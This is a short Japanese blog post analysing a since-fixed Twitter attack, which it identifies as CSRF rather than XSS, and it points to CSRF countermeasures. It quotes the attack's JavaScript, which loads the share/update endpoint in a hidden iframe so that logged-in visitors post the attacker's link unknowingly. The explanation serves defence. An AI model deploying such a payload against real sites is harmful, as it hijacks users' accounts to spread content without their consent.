twitterでCSRFがあったらしい

Twitterでまた悪質リンクが横行――解決済み(ITmedia)


記事はXSSタグが付いているが、実際の攻撃はCSRFのようだ。

<script type="text/javascript">
var el1 = document.createElement('iframe');
el1.style.visibility="hidden";
el1.src = "http://twitter.com/share/update?status=WTF:%20" +window.location;
document.getElementsByTagName("body")[0].appendChild(el1);


インラインフレームを仕込んで、ブラウザをhttp://twitter.com/share/updateにアクセスさせてるようです。
これにより、攻撃サイトのURLをユーザー(ログイン済み)に投稿させることに成功してます。


いわゆるワンタイムトークンと言ったhidden領域にパラメーターを仕込んで、リクエストの正当性をチェックする事をしていなかった為、インラインフレームへのアクセスが投稿の引き金に成り得た訳です.


CSRFの対策としては
開発者のための正しいCSRF対策
CSRF対策法と効果
等が参考になるかともいます。